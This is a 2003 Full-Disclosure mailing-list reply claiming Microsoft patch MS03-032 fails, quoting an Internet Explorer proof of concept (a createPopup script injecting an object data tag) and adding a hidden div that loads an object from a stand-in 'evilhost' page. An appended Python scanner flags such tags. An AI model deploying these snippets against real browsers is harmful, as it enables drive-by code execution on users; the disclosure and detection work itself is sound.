----- Original Message -----
From: "[email protected]" <[email protected]>
To: <[email protected]>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
>
>
> Since the cat somehow got out of the bag, and more importantly, this
> is so blatantly obvious, herewith is the "Bad News":
>
> The patch for Drew's object data=funky.hta doesn't work:
>
> http://www.malware.com/badnews.html
>
> <script>
> var oPopup = window.createPopup();
>
> function showPopup() {
> oPopup.document.body.innerHTML = "<object data=ouch.php>";
> oPopup.show(0,0,1,1,document.body);
> }
>
> showPopup()
> </script>
this works too…
<div style="display.none"><object data="http://evilhost/realbad.asp">
</object>oh</div>
beware the mail…
and the rewtXSS skillz
Donnie Werner
[email protected]
http://exploitlabs.com
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
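
For triage on the receiving side, an added example (not part of either poster's message) that flags `<object data=...>` both as static markup and as a string inside script text, the two forms shown in this thread. The class and function names and the sample document are constructed for illustration.

```python
import re
from html.parser import HTMLParser
# An <object ... data=...> tag written as text, e.g. inside a script string.
OBJECT_DATA_RE = re.compile(r"<\s*object\b[^>]*\bdata\s*=", re.IGNORECASE)

class ObjectDataScanner(HTMLParser):
    """Records <object data=...> in static markup and inside <script> text."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []                          # (kind, line, detail)
        self._script, self._script_line = None, 0   # buffer while in <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script, self._script_line = [], self.getpos()[0]
        elif tag == "object":
            data = dict(attrs).get("data")
            if data is not None:
                self.findings.append(("markup", self.getpos()[0], data))

    def handle_data(self, data):
        # Script bodies arrive as raw text, never as start tags.
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            text = "".join(self._script)
            for m in OBJECT_DATA_RE.finditer(text):
                line = self._script_line + text.count("\n", 0, m.start())
                self.findings.append(("script-string", line, m.group(0)))
            self._script = None

def scan(html_text):
    scanner = ObjectDataScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings

# Constructed sample (not taken from a real message).
SAMPLE = """<html><body>
<script>
var p = window.createPopup();
p.document.body.innerHTML = "<object data=sample.php>";
</script>
<div><object data="http://host.example/page"></object></div>
</body></html>"""
if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Text matching only catches the tag when it appears literally in the script source, so findings are a triage signal for HTML mail and pages rather than a complete filter.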